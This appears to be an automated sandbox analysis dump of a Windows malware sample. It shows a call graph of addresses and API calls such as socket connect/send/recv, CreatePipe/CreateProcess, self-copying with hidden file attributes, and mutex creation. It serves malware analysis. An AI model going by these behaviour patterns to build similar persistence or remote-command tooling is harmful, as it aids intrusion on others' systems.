171050 8 API calls 10367->10370 10371 1617b2 10368->10371 10372 1617de 10368->10372 10373 161600 10369->10373 10370->10368 10371->10293 10374 1618c4 gethostbyname 10372->10374 10375 1617fb setsockopt 10372->10375 10376 151bb0 2 API calls 10373->10376 10374->10316 10379 1618ed inet_ntoa inet_addr htons connect 10374->10379 10377 161866 10375->10377 10378 161628 10376->10378 10377->10374 10382 175820 wvsprintfA 10378->10382 10381 1619ca 10379->10381 10384 1619e0 10379->10384 10381->10293 10383 16165e 10382->10383 10385 151bb0 2 API calls 10383->10385 10386 161a00 send 10384->10386 10387 16167a 10385->10387 10391 161a1e 10386->10391 10388 1701a0 9 API calls 10387->10388 10389 1616b3 10388->10389 10390 171050 8 API calls 10389->10390 10390->10392 10393 15d990 8 API calls 10391->10393 10396 161a3e 10391->10396 10392->10354 10394 161add recv 10393->10394 10395 1621ad closesocket 10394->10395 10408 161b57 10394->10408 10398 162210 10395->10398 10396->10293 10398->10316 10399 16b500 8 API calls 10398->10399 10399->10316 10400 150110 8 API calls 10400->10408 10401 154290 8 API calls 10401->10408 10402 162135 recv 10403 162187 10402->10403 10402->10408 10403->10395 10404 151bb0 GetProcessHeap RtlFreeHeap 10404->10408 10406 142f90 GetProcessHeap RtlAllocateHeap 10406->10408 10407 15a810 9 API calls 10407->10408 10408->10395 10408->10400 10408->10401 10408->10402 10408->10403 10408->10404 10408->10406 10408->10407 10430 141df0 10408->10430 10438 14c110 10408->10438 10410 158d16 10409->10410 10412 158f44 10410->10412 10413 158ee8 10410->10413 10414 158db7 10410->10414 10411 158dca DeleteFileA 10411->10414 10412->10277 10413->10412 10462 157d40 10413->10462 10414->10410 10414->10411 10414->10413 10457 141c30 10414->10457 10418 15c79b 10417->10418 10419 154290 8 API calls 10418->10419 10420 15c86a 10418->10420 10419->10420 10420->10293 10422 157202 10421->10422 10423 142f90 2 API calls 10422->10423 10424 157648 10423->10424 10425 151bb0 2 API calls 10424->10425 10426 157684 10425->10426 10426->10302 10427->10313 10428->10314 10429->10317 10431 141e0f 10430->10431 10433 141e37 10430->10433 10432 1708b0 GetSystemTimeAsFileTime 10431->10432 10432->10433 10433->10408 10435 16b51e 10434->10435 10453 1566f0 10435->10453 10437 16b5e9 10437->10343 10439 14c152 10438->10439 10440 142f90 2 API calls 10439->10440 10441 14c193 10440->10441 10442 15a810 9 API calls 10441->10442 10443 14c1d1 10442->10443 10444 151bb0 2 API calls 10443->10444 10445 14c205 10444->10445 10446 14c218 10445->10446 10447 142f90 2 API calls 10445->10447 10446->10408 10448 14c245 10447->10448 10449 15a810 9 API calls 10448->10449 10450 14c29b 10449->10450 10451 151bb0 2 API calls 10450->10451 10452 14c2f8 10451->10452 10452->10408 10454 15670d 10453->10454 10455 150110 8 API calls 10454->10455 10456 156738 10455->10456 10456->10437 10466 14f270 10457->10466 10459 141c6a 10470 15d720 10459->10470 10463 157d69 10462->10463 10465 157e27 10463->10465 10485 14bba0 10463->10485 10465->10413 10467 14f29a 10466->10467 10468 150110 8 API calls 10467->10468 10469 14f2a2 10468->10469 10469->10459 10471 15d72e 10470->10471 10472 141c70 10471->10472 10474 152a80 10471->10474 10472->10414 10477 14e100 10474->10477 10476 152a8f 10476->10472 10478 14e111 10477->10478 10481 141000 10478->10481 10480 14e127 10480->10476 10482 14100b 10481->10482 10483 163f00 8 API calls 10482->10483 10484 141068 10483->10484 10484->10480 10488 1630b0 10485->10488 10489 1630e4 10488->10489 10490 1566f0 8 API calls 10489->10490 10491 14bbae 10490->10491 10491->10465 10518 14a830 10521 15b720 10518->10521 10520 14a83f 10522 15b72e 10521->10522 10525 14d500 lstrlen 10522->10525 10524 15b739 10524->10520 10525->10524 10984 174eb3 10985 174ec5 10984->10985 10987 147a04 174 API calls 10985->10987 10986 174ec9 10987->10986 11102 141130 11103 14114b 11102->11103 11104 164420 8 API calls 11103->11104 11105 14115b 11104->11105 11106 14f330 11109 14d500 lstrlen 11106->11109 11108 14f38f 11109->11108 11110 14fb30 11111 152df0 8 API calls 11110->11111 11112 14fb55 11111->11112 10988 157eb0 10989 157ec0 10988->10989 10990 157eba 10988->10990 10991 152eb0 2 API calls 10990->10991 10991->10989 10992 15a0a6 10993 15a0b0 10992->10993 10994 15a428 10993->10994 10995 156810 8 API calls 10993->10995 10998 141ca0 9 API calls 10993->10998 10996 141ca0 9 API calls 10994->10996 10997 156810 8 API calls 10994->10997 11000 15a5a1 10994->11000 10995->10993 10996->10994 10997->10994 10998->10993 10999 151bb0 2 API calls 11001 15a606 10999->11001 11000->10999 11121 143520 11122 14353f 11121->11122 11123 1568d0 4 API calls 11122->11123 11124 14355e 11122->11124 11123->11124 11171 15c9a0 11172 15c9be 11171->11172 11177 14d500 lstrlen 11172->11177 11174 15c9fd 11178 14df70 11174->11178 11177->11174 11181 160b70 11178->11181 11180 14df8a 11182 160baf 11181->11182 11183 160c9b 11182->11183 11184 160ca8 11182->11184 11185 1566f0 8 API calls 11183->11185 11186 14e320 8 API calls 11184->11186 11187 160ca6 11184->11187 11185->11187 11186->11187 11187->11180 10492 1645a9 10493 1645bd 10492->10493 10498 160610 10493->10498 10497 1645ee 10499 16062b 10498->10499 10505 14b690 10499->10505 10501 160660 10502 16fde0 10501->10502 10503 16fe12 GetStdHandle GetStdHandle GetStdHandle 10502->10503 10504 16fdf7 10502->10504 10503->10497 10504->10503 10506 14b6b6 GetProcessHeap HeapAlloc 10505->10506 10506->10501 11125 174f57 11126 174ec5 11125->11126 11126->11125 11127 174f77 11126->11127 11129 147a04 174 API calls 11126->11129 11128 174ec9 11129->11128 11002 15fcd7 11014 15f850 11002->11014 11003 168b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11003->11014 11004 141170 2 API calls 11005 160425 11004->11005 11006 158bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11006->11014 11007 16ab60 4 API calls 11007->11014 11008 152c90 4 API calls 11008->11014 11009 16024a 11011 152c90 4 API calls 11009->11011 11013 160299 11009->11013 11010 171190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11010->11014 11011->11013 11012 160790 4 API calls 11012->11014 11015 152c90 4 API calls 11013->11015 11016 160368 11013->11016 11014->11003 11014->11006 11014->11007 11014->11008 11014->11009 11014->11010 11014->11012 11014->11016 11015->11016 11016->11004 11017 1428d0 11018 1428e7 11017->11018 11019 142903 11017->11019 11020 142935 11019->11020 11021 142a46 ReadFile 11019->11021 11022 142a61 11021->11022 11023 142cd0 11028 151cc0 11023->11028 11035 16b450 11028->11035 11036 16b46a 11035->11036 11037 1700f0 8 API calls 11036->11037 11038 16b49b 11037->11038 11039 14fed0 11040 14feeb 11039->11040 11041 14bb70 8 API calls 11040->11041 11042 14ff10 11041->11042 11045 163080 11042->11045 11046 16308e 11045->11046 11047 154290 8 API calls 11046->11047 11048 14ff27 11047->11048 11188 14f9d0 11189 14f9e6 11188->11189 11192 163c50 11189->11192 11191 14fa49 11193 163c6f 11192->11193 11194 14e320 8 API calls 11193->11194 11195 163c86 11194->11195 11195->11191 11049 160ad0 11052 14b780 11049->11052 11055 15d750 11052->11055 11056 15d77e 11055->11056 11057 15d75a 11055->11057 11058 152eb0 2 API calls 11057->11058 11058->11056 11196 160fd8 11197 160fe0 11196->11197 11294 14d500 lstrlen 11197->11294 11199 16110c 11295 14d500 lstrlen 11199->11295 11201 162250 11202 16111a 11202->11201 11203 142f90 2 API calls 11202->11203 11204 161195 11203->11204 11205 14d530 9 API calls 11204->11205 11206 1611c3 11205->11206 11207 151bb0 2 API calls 11206->11207 11208 1611d5 11207->11208 11210 142f90 2 API calls 11208->11210 11237 16134c 11208->11237 11209 1701a0 9 API calls 11211 1613d8 11209->11211 11212 161226 11210->11212 11213 171050 8 API calls 11211->11213 11214 15a810 9 API calls 11212->11214 11215 1613e4 11213->11215 11217 161258 11214->11217 11216 142f90 2 API calls 11215->11216 11218 161422 11216->11218 11221 151bb0 2 API calls 11217->11221 11219 1701a0 9 API calls 11218->11219 11220 16144a 11219->11220 11222 171050 8 API calls 11220->11222 11224 161288 11221->11224 11223 161456 11222->11223 11225 151bb0 2 API calls 11223->11225 11226 16b500 8 API calls 11224->11226 11224->11237 11227 161478 11225->11227 11228 1612fa 11226->11228 11232 1701a0 9 API calls 11227->11232 11229 142f90 2 API calls 11228->11229 11230 161310 11229->11230 11231 14d530 9 API calls 11230->11231 11233 161328 11231->11233 11234 1614e2 11232->11234 11235 151bb0 2 API calls 11233->11235 11236 171050 8 API calls 11234->11236 11235->11237 11238 1614f1 11236->11238 11237->11209 11242 142f90 2 API calls 11238->11242 11277 1616c2 11238->11277 11239 142f90 2 API calls 11240 161702 11239->11240 11241 1701a0 9 API calls 11240->11241 11243 161728 11241->11243 11244 161595 11242->11244 11245 171050 8 API calls 11243->11245 11246 1701a0 9 API calls 11244->11246 11247 161734 11245->11247 11248 1615d0 11246->11248 11251 151bb0 2 API calls 11247->11251 11249 171050 8 API calls 11248->11249 11250 1615df 11249->11250 11254 142f90 2 API calls 11250->11254 11252 16174e 11251->11252 11253 161786 socket 11252->11253 11255 171050 8 API calls 11252->11255 11256 1617b2 11253->11256 11257 1617de 11253->11257 11258 161600 11254->11258 11255->11253 11259 1618c4 gethostbyname 11257->11259 11260 1617fb setsockopt 11257->11260 11261 151bb0 2 API calls 11258->11261 11259->11201 11264 1618ed inet_ntoa inet_addr htons connect 11259->11264 11262 161866 11260->11262 11263 161628 11261->11263 11262->11259 11267 175820 wvsprintfA 11263->11267 11266 1619ca 11264->11266 11269 1619e0 11264->11269 11268 16165e 11267->11268 11270 151bb0 2 API calls 11268->11270 11271 161a00 send 11269->11271 11272 16167a 11270->11272 11276 161a1e 11271->11276 11273 1701a0 9 API calls 11272->11273 11274 1616b3 11273->11274 11275 171050 8 API calls 11274->11275 11275->11277 11278 15d990 8 API calls 11276->11278 11281 161a3e 11276->11281 11277->11239 11279 161add recv 11278->11279 11280 1621ad closesocket 11279->11280 11293 161b57 11279->11293 11283 162210 11280->11283 11282 141df0 GetSystemTimeAsFileTime 11282->11293 11283->11201 11284 16b500 8 API calls 11283->11284 11284->11201 11285 150110 8 API calls 11285->11293 11286 154290 8 API calls 11286->11293 11287 162135 recv 11288 162187 11287->11288 11287->11293 11288->11280 11289 151bb0 GetProcessHeap RtlFreeHeap 11289->11293 11290 14c110 9 API calls 11290->11293 11291 142f90 GetProcessHeap RtlAllocateHeap 11291->11293 11292 15a810 9 API calls 11292->11293 11293->11280 11293->11282 11293->11285 11293->11286 11293->11287 11293->11288 11293->11289 11293->11290 11293->11291 11293->11292 11294->11199 11295->11202 11296 14a5c0 11297 15d990 8 API calls 11296->11297 11298 14a600 11297->11298 11303 142b40 11298->11303 11300 14a61d 11301 15d990 8 API calls 11300->11301 11302 14a6ac 11301->11302 11304 142b51 11303->11304 11305 164420 8 API calls 11304->11305 11306 142b61 11305->11306 11306->11300 10530 15ca40 10531 15ca62 10530->10531 10586 1649b0 10531->10586 10533 15cb32 10534 164af0 4 API calls 10533->10534 10536 15d03e 10533->10536 10535 15cc06 10534->10535 10537 142f90 2 API calls 10535->10537 10538 15cc2c 10537->10538 10539 14d530 9 API calls 10538->10539 10540 15cc44 10539->10540 10541 151bb0 2 API calls 10540->10541 10542 15cc6b 10541->10542 10590 142f00 10542->10590 10547 171050 8 API calls 10548 15cccb 10547->10548 10549 142f90 2 API calls 10548->10549 10550 15ccf4 10549->10550 10551 1701a0 9 API calls 10550->10551 10552 15cd19 10551->10552 10553 171050 8 API calls 10552->10553 10554 15cd25 10553->10554 10555 151bb0 2 API calls 10554->10555 10556 15cd47 10555->10556 10557 15c770 8 API calls 10556->10557 10558 15cd7b 10557->10558 10559 171050 8 API calls 10558->10559 10560 15cd84 10559->10560 10561 16b500 8 API calls 10560->10561 10562 15cdb4 10561->10562 10596 14e550 10562->10596 10564 15cde5 10565 1597b0 9 API calls 10564->10565 10566 15ce25 10565->10566 10654 15bf40 10566->10654 10569 142f90 2 API calls 10570 15ce9c 10569->10570 10571 1701a0 9 API calls 10570->10571 10572 15cec2 10571->10572 10573 171050 8 API calls 10572->10573 10574 15cece 10573->10574 10575 151bb0 2 API calls 10574->10575 10576 15cf08 10575->10576 10577 154290 8 API calls 10576->10577 10578 15cf34 10577->10578 10579 15d990 8 API calls 10578->10579 10580 15cfb2 10579->10580 10581 142f90 2 API calls 10580->10581 10582 15cfd0 10581->10582 10583 160d80 22 API calls 10582->10583 10584 15d029 10583->10584 10585 151bb0 2 API calls 10584->10585 10585->10536 10587 154290 8 API calls 10586->10587 10588 1649e4 SetEvent 10587->10588 10588->10533 10658 1508d0 10590->10658 10593 164df0 10594 14e100 8 API calls 10593->10594 10595 15ccbf 10594->10595 10595->10547 10597 14e5ad 10596->10597 10598 142f90 2 API calls 10597->10598 10603 14e6cb 10597->10603 10599 14e689 10598->10599 10600 14d530 9 API calls 10599->10600 10601 14e6a0 10600->10601 10602 151bb0 2 API calls 10601->10602 10602->10603 10604 14e7e1 10603->10604 10605 14e77f 10603->10605 10608 142f90 2 API calls 10604->10608 10606 142f90 2 API calls 10605->10606 10607 14e795 10606->10607 10609 14d530 9 API calls 10607->10609 10610 14e819 10608->10610 10611 14e7ac 10609->10611 10670 16f500 10610->10670 10612 151bb0 2 API calls 10611->10612 10613 14e7c5 10612->10613 10613->10564 10616 151bb0 2 API calls 10617 14e893 10616->10617 10618 14e8bf 10617->10618 10619 14e9a8 10617->10619 10621 142f90 2 API calls 10618->10621 10682 15d820 10619->10682 10623 14e924 10621->10623 10628 14d530 9 API calls 10623->10628 10624 14e9d6 10627 142f90 2 API calls 10624->10627 10625 14ea7f 10626 1648d0 lstrlen 10625->10626 10629 14eac3 10626->10629 10630 14e9fb 10627->10630 10632 14e96c 10628->10632 10686 14ff90 10629->10686 10631 14d530 9 API calls 10630->10631 10633 14ea36 10631->10633 10634 151bb0 2 API calls 10632->10634 10636 151bb0 2 API calls 10633->10636 10637 14e994 10634->10637 10639 14ea49 10636->10639 10637->10564 10639->10564 10642 142f90 2 API calls 10643 14eb9a 10642->10643 10644 151bb0 2 API calls 10643->10644 10645 14ebe8 10644->10645 10694 14d500 lstrlen 10645->10694 10647 14ec14 10648 151d90 5 API calls 10647->10648 10649 14ec47 10648->10649 10695 158200 10649->10695 10653 14ed7c 10653->10564 10655 15bf63 10654->10655 10656 164420 8 API calls 10655->10656 10657 15bf73 10656->10657 10657->10569 10659 1508db 10658->10659 10662 157ed0 10659->10662 10663 157eec 10662->10663 10666 164420 10663->10666 10667 164434 10666->10667 10668 152df0 8 API calls 10667->10668 10669 142f17 10668->10669 10669->10593 10671 16f5be 10670->10671 10679 14e83f 10671->10679 10719 1421f0 10671->10719 10675 16f77d 10676 16f6bd 10675->10676 10729 15dcf0 10675->10729 10749 142f20 10676->10749 10679->10616 10680 16f882 10737 170220 10680->10737 10683 15d83c GetModuleFileNameA 10682->10683 10685 14e9cb 10683->10685 10685->10624 10685->10625 10687 14ffcb 10686->10687 10688 150920 9 API calls 10687->10688 10689 14eaeb 10687->10689 10688->10689 10690 157ff0 10689->10690 10693 158035 10690->10693 10691 14eb0c 10691->10642 10692 14ff90 9 API calls 10692->10693 10693->10691 10693->10692 10694->10647 10696 15823e 10695->10696 10697 158465 CreatePipe 10696->10697 10698 158499 SetHandleInformation CreatePipe 10697->10698 10699 15848a 10697->10699 10702 1585cd SetHandleInformation 10698->10702 10703 15858a 10698->10703 10701 15d990 8 API calls 10699->10701 10704 14ed18 DeleteFileA 10699->10704 10701->10704 10707 15860f 10702->10707 10705 1587e3 CloseHandle 10703->10705 10704->10653 10705->10699 10706 1587fd CloseHandle 10705->10706 10706->10699 10708 158719 CreateProcessA 10707->10708 10709 158777 10708->10709 10710 15885c WriteFile 10709->10710 10711 158789 CloseHandle CloseHandle 10709->10711 10710->10711 10713 1588dd CloseHandle CloseHandle 10710->10713 10711->10705 10714 15893e 10713->10714 10916 1423a0 10714->10916 10717 1589e6 CloseHandle CloseHandle 10718 1589b2 10718->10717 10720 14221e 10719->10720 10752 163a80 10720->10752 10723 168b60 4 API calls 10724 1422d1 10723->10724 10724->10676 10725 168b60 10724->10725 10726 168b95 10725->10726 10727 163a80 4 API calls 10726->10727 10728 168be0 10727->10728 10728->10675 10730 15dd26 10729->10730 10758 14bfa0 10730->10758 10734 15dd68 10770 170a90 10734->10770 10736 15dd93 10736->10680 10738 17022d 10737->10738 10740 1703d0 10738->10740 10782 14c6b0 10738->10782 10740->10676 10741 170613 10742 170713 10741->10742 10744 142f90 2 API calls 10741->10744 10742->10676 10743 170369 10743->10740 10743->10741 10745 142f90 2 API calls 10743->10745 10748 1705e4 10744->10748 10746 1705c8 10745->10746 10747 151bb0 2 API calls 10746->10747 10746->10748 10747->10741 10748->10676 10750 141170 2 API calls 10749->10750 10751 142f63 10750->10751 10751->10679 10753 163ab7 10752->10753 10755 1422ae 10752->10755 10754 14e2c0 2 API calls 10753->10754 10756 163ade 10754->10756 10755->10723 10755->10724 10756->10755 10757 152eb0 2 API calls 10756->10757 10757->10755 10759 14c008 10758->10759 10760 142f90 2 API calls 10759->10760 10761 14c048 10760->10761 10762 151bb0 2 API calls 10761->10762 10763 14c072 10762->10763 10764 154db0 10763->10764 10766 154dfc 10764->10766 10769 1550de 10764->10769 10765 154f9c 10767 164ea0 4 API calls 10765->10767 10765->10769 10766->10765 10776 164ea0 10766->10776 10767->10765 10769->10734 10771 170ab6 10770->10771 10772 154db0 4 API calls 10771->10772 10773 170dd8 10772->10773 10774 154db0 4 API calls 10773->10774 10775 170e55 10774->10775 10775->10736 10777 164f16 10776->10777 10778 142f90 2 API calls 10777->10778 10779 165042 10778->10779 10780 151bb0 2 API calls 10779->10780 10781 1653e8 10780->10781 10781->10765 10783 14c6f6 10782->10783 10784 1421f0 4 API calls 10783->10784 10786 14c722 10784->10786 10785 141170 2 API calls 10787 14c8d2 10785->10787 10788 14c74d 10786->10788 10791 14c79a 10786->10791 10793 14c813 10786->10793 10787->10743 10794 141170 10788->10794 10798 1530f0 10791->10798 10793->10785 10796 14119e 10794->10796 10795 141396 10795->10743 10796->10795 10797 152eb0 2 API calls 10796->10797 10797->10796 10800 15313f 10798->10800 10799 1540b3 10799->10793 10800->10799 10801 163a80 4 API calls 10800->10801 10802 15338d 10801->10802 10804 163a80 4 API calls 10802->10804 10830 153959 10802->10830 10803 154009 10805 15403e 10803->10805 10806 15404a 10803->10806 10807 1533ef 10804->10807 10808 141170 2 API calls 10805->10808 10809 141170 2 API calls 10806->10809 10811 163a80 4 API calls 10807->10811 10807->10830 10813 154045 10808->10813 10809->10813 10810 141170 2 API calls 10810->10830 10812 15343c 10811->10812 10814 168b60 4 API calls 10812->10814 10817 153469 10812->10817 10812->10830 10813->10793 10815 15349c 10814->10815 10815->10830 10834 171190 10815->10834 10818 1535d4 10817->10818 10819 1535e7 10817->10819 10817->10830 10820 14ad30 4 API calls 10818->10820 10846 152c90 10819->10846 10824 1535e2 10820->10824 10825 152c90 4 API calls 10824->10825 10826 15363c 10825->10826 10827 163a80 4 API calls 10826->10827 10826->10830 10828 153750 10827->10828 10829 152c90 4 API calls 10828->10829 10828->10830 10832 153813 10829->10832 10830->10803 10830->10810 10831 163a80 4 API calls 10831->10832 10832->10830 10832->10831 10833 152c90 4 API calls 10832->10833 10833->10832 10835 1711d8 10834->10835 10836 163a80 4 API calls 10835->10836 10837 1534da 10835->10837 10836->10837 10837->10830 10838 14ad30 10837->10838 10839 14ad45 10838->10839 10851 15f160 10839->10851 10841 14ad8b 10843 14ae1f 10841->10843 10845 14ade7 10841->10845 10893 160790 10841->10893 10843->10817 10845->10843 10900 16ab60 10845->10900 10849 152cb9 10846->10849 10847 152ce0 10847->10824 10848 163a80 4 API calls 10850 152d76 10848->10850 10849->10847 10849->10848 10850->10824 10853 15f1b5 10851->10853 10852 15f1bc 10852->10841 10853->10852 10854 15f322 10853->10854 10855 15f27a 10853->10855 10857 152c90 4 API calls 10854->10857 10856 15f2bb 10855->10856 10858 168b60 4 API calls 10855->10858 10859 15f2f8 10856->10859 10860 152c90 4 API calls 10856->10860 10885 15f2eb 10856->10885 10861 15f392 10857->10861 10858->10856 10859->10841 10860->10885 10863 152c90 4 API calls 10861->10863 10861->10885 10862 141170 2 API calls 10864 160425 10862->10864 10865 15f3d9 10863->10865 10864->10841 10866 163a80 4 API calls 10865->10866 10865->10885 10867 15f440 10866->10867 10868 168b60 4 API calls 10867->10868 10867->10885 10869 15f461 10868->10869 10870 163a80 4 API calls 10869->10870 10869->10885 10871 15f485 10870->10871 10872 163a80 4 API calls 10871->10872 10871->10885 10873 15f4a7 10872->10873 10874 171190 4 API calls 10873->10874 10876 15f5fa 10873->10876 10873->10885 10875 15f5a0 10874->10875 10878 171190 4 API calls 10875->10878 10875->10885 10877 171190 4 API calls 10876->10877 10876->10885 10881 15f6df 10877->10881 10878->10876 10879 16ab60 4 API calls 10879->10881 10880 16024a 10882 152c90 4 API calls 10880->10882 10883 160299 10880->10883 10881->10879 10887 15f7e0 10881->10887 10882->10883 10884 152c90 4 API calls 10883->10884 10883->10885 10884->10885 10885->10859 10885->10862 10886 168b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10886->10887 10887->10880 10887->10885 10887->10886 10888 158bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10887->10888 10889 16ab60 4 API calls 10887->10889 10890 152c90 4 API calls 10887->10890 10891 171190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10887->10891 10892 160790 4 API calls 10887->10892 10888->10887 10889->10887 10890->10887 10891->10887 10892->10887 10894 1607cb 10893->10894 10898 160882 10893->10898 10895 160926 10894->10895 10896 1607e5 10894->10896 10897 15d9a0 4 API calls 10895->10897 10907 15d9a0 10896->10907 10897->10898 10898->10841 10902 16ab77 10900->10902 10901 16ac21 10901->10845 10902->10901 10903 16ac6c 10902->10903 10904 16ac0c 10902->10904 10906 15d9a0 4 API calls 10903->10906 10905 15d9a0 4 API calls 10904->10905 10905->10901 10906->10901 10911 15d9c5 10907->10911 10908 15da26 10908->10898 10909 15dadb 10910 152c90 4 API calls 10909->10910 10913 15db90 10909->10913 10910->10913 10911->10908 10911->10909 10912 152c90 4 API calls 10911->10912 10912->10909 10914 141170 2 API calls 10913->10914 10915 15dc9f 10914->10915 10915->10898 10917 1423ad 10916->10917 10918 15d990 8 API calls 10917->10918 10919 1423f2 ReadFile 10918->10919 10920 1424c1 WaitForSingleObject 10919->10920 10921 142452 10919->10921 10920->10717 10920->10718 10921->10920 10922 154290 8 API calls 10921->10922 10923 14247e ReadFile 10922->10923 10923->10920 10923->10921 11059 15a6c0 11060 15a6d7 11059->11060 11061 164450 13 API calls 11060->11061 11062 15a71c 11061->11062 11063 154290 8 API calls 11062->11063 11064 15a7ea 11063->11064 11307 16b3c0 11308 152a80 8 API calls 11307->11308 11309 16b3d9 11308->11309 11310 171050 8 API calls 11309->11310 11311 16b42e 11310->11311 10924 153874 10933 153880 10924->10933 10925 163a80 4 API calls 10925->10933 10926 154009 10927 15403e 10926->10927 10928 15404a 10926->10928 10929 141170 2 API calls 10927->10929 10930 141170 2 API calls 10928->10930 10934 154045 10929->10934 10930->10934 10931 152c90 4 API calls 10931->10933 10932 141170 2 API calls 10935 153959 10932->10935 10933->10925 10933->10931 10933->10935 10935->10926 10935->10932 11312 156ff0 11313 15700d 11312->11313 11322 14d500 lstrlen 11313->11322 11315 157083 11316 150110 8 API calls 11315->11316 11317 157099 11316->11317 11318 141ca0 9 API calls 11317->11318 11319 1570ac 11318->11319 11320 163080 8 API calls 11319->11320 11321 1570d0 11320->11321 11322->11315 10940 166a7b 10941 166a8c 10940->10941 10942 167846 10941->10942 10943 1677c2 10941->10943 10957 165706 10941->10957 10945 167852 10942->10945 10946 16793b 10942->10946 10944 175820 wvsprintfA 10943->10944 10944->10957 10948 1678c5 10945->10948 10950 16786e 10945->10950 10947 1679a8 10946->10947 10949 167957 10946->10949 10952 175820 wvsprintfA 10947->10952 10951 175820 wvsprintfA 10948->10951 10954 175820 wvsprintfA 10949->10954 10949->10957 10953 175820 wvsprintfA 10950->10953 10950->10957 10951->10957 10952->10957 10953->10957 10954->10957 10955 1686f1 10957->10955 10958 14d500 lstrlen 10957->10958 10958->10957 11130 142764 11131 142770 Sleep 11130->11131 11133 14279b 11131->11133 11132 1708b0 GetSystemTimeAsFileTime 11132->11133 11133->11131 11133->11132 11134 1427c8 11133->11134 9311 1644e7 9312 1644f0 9311->9312 9314 16457d 9312->9314 9315 150920 9312->9315 9316 150945 9315->9316 9332 163110 9316->9332 9320 150a68 GetProcAddress 9322 150aa7 9320->9322 9321 150c03 CryptGenRandom 9330 150c1a 9321->9330 9323 142f90 2 API calls 9322->9323 9324 150ad3 9323->9324 9340 151bb0 9324->9340 9329 151bb0 2 API calls 9331 150b2c 9329->9331 9344 16fcc0 9330->9344 9331->9321 9331->9330 9333 16312e WaitForSingleObject 9332->9333 9335 150a18 9333->9335 9335->9331 9336 142f90 9335->9336 9337 142feb 9336->9337 9348 14e2c0 9337->9348 9339 143034 9339->9320 9341 151bd0 9340->9341 9351 152eb0 GetProcessHeap RtlFreeHeap 9341->9351 9345 16fce5 ReleaseMutex 9344->9345 9346 16fcdb 9344->9346 9347 150d8e 9345->9347 9346->9345 9347->9312 9349 14e2e4 9348->9349 9350 14e2f2 GetProcessHeap RtlAllocateHeap 9348->9350 9349->9350 9350->9339 9352 150ae7 GetProcAddress 9351->9352 9352->9329 11068 1666e7 11069 16679c 11068->11069 11073 165706 11069->11073 11075 14d500 lstrlen 11069->11075 11071 1686f1 11073->11071 11074 14d500 lstrlen 11073->11074 11074->11073 11075->11073 11076 1644e5 11077 1644f0 11076->11077 11078 150920 9 API calls 11077->11078 11079 16457d 11077->11079 11078->11077 10959 151860 10960 15187d 10959->10960 10961 15189b SetServiceStatus 10960->10961 10962 1518c1 10960->10962 10963 1518cb SetServiceStatus SetEvent 10960->10963 10962->10963 11338 1655e0 11339 165643 11338->11339 11341 165679 11338->11341 11340 1656c7 11341->11340 11343 14d500 lstrlen 11341->11343 11343->11341

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00147A04 Relevance: 65.3, APIs: 29, Strings: 7, Instructions: 2326sleepfilesynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,C:\Windows\system32\config\systemprofile,00000104), ref: 001483DA
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00148448
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 001484DC
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001484F7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00148599
                                                                                                                                                                                                              • Part of subcall function 00155200: GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000D05), ref: 00148B70
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00148DAC
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00148E86
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00148E9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00148EC3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 0014912B
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00149186
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00149265
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?), ref: 00149370
                                                                                                                                                                                                              • Part of subcall function 0014A4E0: lstrlen.KERNEL32(00152325,00000000,?,00152325,?), ref: 0014A4FE
                                                                                                                                                                                                              • Part of subcall function 0014A4E0: CharLowerBuffA.USER32(00152325,00000000,?,00152325,?), ref: 0014A550
                                                                                                                                                                                                              • Part of subcall function 0014D500: lstrlen.KERNEL32(?,?,0016965D,?,00000104,?,00000001), ref: 0014D523
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 001496D4
                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 0014995E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(0000012C), ref: 00149AC8
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00149AEC
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00149B0C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 00149B3B
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00149C52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00148CB2
                                                                                                                                                                                                              • Part of subcall function 0014BBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
                                                                                                                                                                                                              • Part of subcall function 0014BBC0: Process32First.KERNEL32(00000000,?), ref: 0014BCE3
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 001486AE
                                                                                                                                                                                                              • Part of subcall function 00142800: ExitProcess.KERNEL32 ref: 00142842
                                                                                                                                                                                                              • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,0016247D), ref: 00170929
                                                                                                                                                                                                              • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00149E32
